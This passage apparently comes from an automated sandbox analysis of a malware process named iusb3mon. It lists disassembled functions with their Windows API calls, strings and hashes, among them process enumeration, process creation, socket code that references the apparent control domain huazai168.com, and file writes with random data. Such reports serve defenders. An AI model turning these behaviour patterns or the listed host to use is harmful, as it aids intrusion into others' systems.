LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?), ref: 062990E1
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 062990F5
GetProcAddress.KERNEL32(00000000,Process32First), ref: 062990FF
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0629910A
lstrcmpiA.KERNEL32(?,?), ref: 06299142
CloseHandle.KERNEL32(00000000,?,?), ref: 06299161
FreeLibrary.KERNEL32(00000000,?,?), ref: 0629916C

Strings

kernel32.dll, xrefs: 062990DC
Process32First, xrefs: 062990F7
CreateToolhelp32Snapshot, xrefs: 062990EF
Process32Next, xrefs: 06299101

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
API String ID: 1314729832-4285911020
Opcode ID: 209be20c233883692783430e0fe3b60dd851e957e77c684d69121d8ada917629
Instruction ID: b787e491fc8d6fbfd9d3408c0d555a69497403a09b183f5458aabad5cb2c48b3
Opcode Fuzzy Hash: 209be20c233883692783430e0fe3b60dd851e957e77c684d69121d8ada917629
Instruction Fuzzy Hash: 3A119130E11329BBDB109F619C4DFEEBBBCEF45750F050099BE40A2140D7B49A41DE61

Function 06293FC8 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 178stringprocessCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 062940AA
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0629410F
lstrcatA.KERNEL32(?,062B7D6C), ref: 06294155
lstrcatA.KERNEL32(?,062942C0), ref: 06294161
lstrcpyA.KERNEL32(00000000,062942C0), ref: 06294169
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 062941AF

Strings

WinSta0\Default, xrefs: 06294185
D, xrefs: 0629417C
%s\shell\open\command, xrefs: 062940A4
"%1, xrefs: 0629411B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateEnvironmentExpandProcessStringslstrcpywsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 2973130283-33419044
Opcode ID: 024f526cc43e9416c8a433f832e5d6e3cba7b12babe56114ea3c0ade8c3de4a0
Instruction ID: af109dbec8403a8478dd84f5a66bd522597803c8602e3b4ee334f933e8742dbc
Opcode Fuzzy Hash: 024f526cc43e9416c8a433f832e5d6e3cba7b12babe56114ea3c0ade8c3de4a0
Instruction Fuzzy Hash: A95177B2D1031DBEDF509AE0DC88EEF77BCEB85355F0004A6EA05E6140D6719A858F70

Function 00345880 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,003420C5,003420C7,00000000,00000000,A302B08A,?,00000000,?,00348D60,00369FF8,000000FE,?,003420C5,?), ref: 00345909
MultiByteToWideChar.KERNEL32(00000000,00000000,003420C5,?,00000000,00000000,?,00348D60,00369FF8,000000FE,?,003420C5), ref: 00345984
SysAllocString.OLEAUT32(00000000), ref: 0034598F
_com_issue_error.COMSUPP ref: 003459B8
_com_issue_error.COMSUPP ref: 003459C2
GetLastError.KERNEL32(80070057,A302B08A,?,00000000,?,00348D60,00369FF8,000000FE,?,003420C5,?), ref: 003459C7
_com_issue_error.COMSUPP ref: 003459DA
GetLastError.KERNEL32(00000000,?,00348D60,00369FF8,000000FE,?,003420C5,?), ref: 003459F0
_com_issue_error.COMSUPP ref: 00345A03

Strings

Z4, xrefs: 00345A19

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID: Z4
API String ID: 1353541977-2245121527
Opcode ID: 9c64d9167dc0b40872e889f702e111e7e79b7653456cfda6e552aabac612b828
Instruction ID: 86c6f70e31c3f277b34d0daa6a0c1ef1f0772110adaff9d426bdddc04c391a37
Opcode Fuzzy Hash: 9c64d9167dc0b40872e889f702e111e7e79b7653456cfda6e552aabac612b828
Instruction Fuzzy Hash: 7241F671E00709EBD7129F65DC45BAEBBE8EF04721F14422AF905EF292DB34A90087A5

Function 06251891 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06251896

Strings

x, xrefs: 06251928
m, xrefs: 06251914
, xrefs: 0625192C
q, xrefs: 06251920
8, xrefs: 06251910
k, xrefs: 06251918
y, xrefs: 0625191C
h, xrefs: 06251924
g, xrefs: 0625190C

Memory Dump Source

Source File: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, Offset: 06250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6250000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: $8$g$h$k$m$q$x$y
API String ID: 3519838083-2346024814
Opcode ID: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
Instruction ID: 6c990e1314eb9675cf2dbdbdec6146b6ec61f80b67b8eaf407a935723eb6ca96
Opcode Fuzzy Hash: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
Instruction Fuzzy Hash: 6E21A4709043C5DEE761DBA8C8497EFBFF89F11304F04455EE89267282D7B96608C762

Function 062974E9 Relevance: 16.5, APIs: 2, Strings: 9, Instructions: 37stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0629739A: wsprintfA.USER32 ref: 06297480

lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 06297532
lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 0629754A

Strings

MarkTime, xrefs: 062974F4, 062974FB
T, xrefs: 06297513
m, xrefs: 0629751B
i, xrefs: 06297517
M, xrefs: 06297503
r, xrefs: 0629750B
a, xrefs: 06297507
k, xrefs: 0629750F
e, xrefs: 0629751F

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: M$MarkTime$T$a$e$i$k$m$r
API String ID: 1220175532-2269700615
Opcode ID: 424734869fb250e37701104125a0e0acbd5f08acdcbb37f596b636a558844c4d
Instruction ID: 83b60c63ee039d06037f4a723b085ae4d63f9d5d46426dfab941355e2f4b1160
Opcode Fuzzy Hash: 424734869fb250e37701104125a0e0acbd5f08acdcbb37f596b636a558844c4d
Instruction Fuzzy Hash: 6E01A2209142C8FADF0297A9DC49BDEBF7A9B92748F0480D9DD5026282D3BA5219C772

Function 00348D60 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00348D97
___except_validate_context_record.LIBVCRUNTIME ref: 00348D9F
_ValidateLocalCookies.LIBCMT ref: 00348E28
__IsNonwritableInCurrentImage.LIBCMT ref: 00348E53
_ValidateLocalCookies.LIBCMT ref: 00348EA8
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00348EBE
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00348ED3

Strings

csm, xrefs: 00348E3D
vm4, xrefs: 00348E45, 00348E4E, 00348E5F

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm$vm4
API String ID: 1385549066-594733904
Opcode ID: b19a6173fefe9653b7b123fd3162cc2abc342e75690a073b05c1c9053ab5d856
Instruction ID: 59a77975deacb9520aea3d821d8915a4dcbcf227ac1045ceb4afc15690d31b4b
Opcode Fuzzy Hash: b19a6173fefe9653b7b123fd3162cc2abc342e75690a073b05c1c9053ab5d856
Instruction Fuzzy Hash: 6E419434A01209DFCF12EF68C881A9FBBE5AF45315F148196E8149F292DB31FE55CB91

Function 062954A3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118sleepstringsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 062954A8

Part of subcall function 062912D2: __EH_prolog.LIBCMT ref: 062912D7
Part of subcall function 062912D2: WSAStartup.WS2_32(00000202,?), ref: 06291328
Part of subcall function 062912D2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06291333

lstrcatA.KERNEL32(?,062BCA18), ref: 062954F7
_rand.LIBCMT ref: 06295503
Sleep.KERNEL32(00000BB8,?,00000000), ref: 0629550D
GetTickCount.KERNEL32 ref: 0629553D
GetTickCount.KERNEL32 ref: 06295559
WaitForSingleObject.KERNEL32(?,00000064), ref: 062955DF
Sleep.KERNEL32(000001F4), ref: 062955EC

Part of subcall function 0629180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06291832
Part of subcall function 0629180D: CancelIo.KERNEL32(?,?,?,?,0629560D), ref: 0629183B
Part of subcall function 0629180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06291847
Part of subcall function 0629180D: closesocket.WS2_32(?), ref: 06291850
Part of subcall function 0629180D: SetEvent.KERNEL32(?,?,?,?,0629560D), ref: 06291859

Part of subcall function 06291AD3: __EH_prolog.LIBCMT ref: 06291AD8
Part of subcall function 06291AD3: TerminateThread.KERNEL32(?,000000FF,00000000,00000000,00000000,?,06295626), ref: 06291B00
Part of subcall function 06291AD3: CloseHandle.KERNEL32(?,?,06295626), ref: 06291B08

Strings

huazai168.com, xrefs: 06295574

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedObjectSingleStartupTerminateThreadWait_randclosesocketlstrcatsetsockopt
String ID: huazai168.com
API String ID: 2260043707-2241639779
Opcode ID: cf1ea7f15613d0560917ba8d5c89e6ca700cafc26f416f6e8ab8f8888bd75c82
Instruction ID: 87e52ae321e57fae95d5d5a050a5087e40cfa373d7ce0a3a2d592b4a37d3e0df
Opcode Fuzzy Hash: cf1ea7f15613d0560917ba8d5c89e6ca700cafc26f416f6e8ab8f8888bd75c82
Instruction Fuzzy Hash: 0641D432E2034A9ADFD5EBA4DC48BDDBB79AF40350F004195DE19A2081DF744A85CF31

Function 06293568 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114stringCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(CTXOPConntion_Class,00000000), ref: 062935CF
GetClassNameA.USER32(?,00000000,00000104), ref: 06293602
GetWindowTextA.USER32(?,?,00000104), ref: 0629362B
lstrlenA.KERNEL32(?), ref: 06293662
GetWindow.USER32(?,00000002), ref: 06293691
lstrlenA.KERNEL32(?), ref: 0629369F

Strings

CTXOPConntion_Class, xrefs: 062935C6, 062935CD, 0629360E
-/-, xrefs: 062936AC
_, xrefs: 0629363F

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$lstrlen$ClassFindNameText
String ID: -/-$CTXOPConntion_Class$_
API String ID: 4118851945-591102176
Opcode ID: afd12d3e7fab57d37a98915ee648a051335835cb3d9fcb06cb02803bd027a70f
Instruction ID: 117cb088272c9a381bcd880d6e6fc57cb1f5a8d5ddf1c0c1fdfea5642663cf6b
Opcode Fuzzy Hash: afd12d3e7fab57d37a98915ee648a051335835cb3d9fcb06cb02803bd027a70f
Instruction Fuzzy Hash: 69319372914209BFEF95DBA4DC09BDE7BB9EF84310F1044B5EA04A2080DAB19A84DF64

Function 062A9390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 062A9395
GetPropA.USER32(?,AfxOldWndProc423), ref: 062A93AD
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 062A940B

Part of subcall function 062A8F78: GetWindowRect.USER32(?,?), ref: 062A8F9D
Part of subcall function 062A8F78: GetWindow.USER32(?,00000004), ref: 062A8FBA

SetWindowLongA.USER32(?,000000FC,?), ref: 062A943B
RemovePropA.USER32(?,AfxOldWndProc423), ref: 062A9443
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 062A944A
GlobalDeleteAtom.KERNEL32(00000000), ref: 062A9451

Part of subcall function 062A8F55: GetWindowRect.USER32(?,?), ref: 062A8F61

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 062A94A5

Strings

AfxOldWndProc423, xrefs: 062A93A3, 062A93AB, 062A9441, 062A9449

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: 1f67f3463694f2cffb05e3952df8bd2fa98b761125cceccf48221873b2604699
Instruction ID: 2228510ab694d2d9297e1f998d429f791237439861e58b72196f35dd4c67839c
Opcode Fuzzy Hash: 1f67f3463694f2cffb05e3952df8bd2fa98b761125cceccf48221873b2604699
Instruction Fuzzy Hash: 36315732C2031AAFDB91AFA5ED49EFF7B79EF09310F000519FE21A1150CBB589519BA1

Function 062AC5BA Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000001C,062C6588,00000100,?,00000000,00000000,062AC863,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773,?,?), ref: 062AC5C9
GlobalAlloc.KERNEL32(00002002,?,?,?,00000000,00000000,062AC863,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773,?,?), ref: 062AC61E
GlobalHandle.KERNEL32(?), ref: 062AC627
GlobalUnlock.KERNEL32(00000000), ref: 062AC630
GlobalReAlloc.KERNEL32(00000000,?,00002002), ref: 062AC642
GlobalHandle.KERNEL32(?), ref: 062AC659
GlobalLock.KERNEL32(00000000), ref: 062AC660
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,062AC863,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773,?,?,00000100), ref: 062AC666
GlobalLock.KERNEL32(?), ref: 062AC675
LeaveCriticalSection.KERNEL32(?), ref: 062AC6BE

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 3a8162a9df566552a5f68107d182b05400d2fc2661c2e6ec62507bcc08f98a3c
Instruction ID: 675ee8b49f128be084616931a22e1cee743b0c736b52ae2ae69b62f31e6037c0
Opcode Fuzzy Hash: 3a8162a9df566552a5f68107d182b05400d2fc2661c2e6ec62507bcc08f98a3c
Instruction Fuzzy Hash: DA314BB56103069FD764DF28EC89A3AB7E9FB85701B01492DEDA2D3650E7B1E805CF10

Function 0625DC56 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 469COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 0625E058
__aulldiv.LIBCMT ref: 0625E06A

Strings

@, xrefs: 0625DFD1
', xrefs: 0625DED0
9, xrefs: 0625E06F
g, xrefs: 0625DDE7
g, xrefs: 0625DE70
, xrefs: 0625E0DF

Memory Dump Source

Source File: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, Offset: 06250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6250000_iusb3mon.jbxd

Yara matches

Similarity

API ID: __aulldiv__aullrem
String ID: $'$9$@$g$g
API String ID: 3839614884-2311196974
Opcode ID: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
Instruction ID: 68122e3f7ea99d8ec611526dd8c6aafefa395312374eacd673ddb514cd3e1f8b
Opcode Fuzzy Hash: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
Instruction Fuzzy Hash: E1028C71C3524AEEEFB4CFA8C9487EDBBB4AF04314F16889ADC51A6280D7748B41CB55

Function 06293777 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filelibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06293788
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 062937B8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 062937D1
GetFileSize.KERNEL32(00000000,00000000), ref: 062937D9
_rand.LIBCMT ref: 0629381A
WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 0629384F
CloseHandle.KERNEL32(?), ref: 06293860

Strings

KERNEL32.dll, xrefs: 06293783

Memory Dump Source

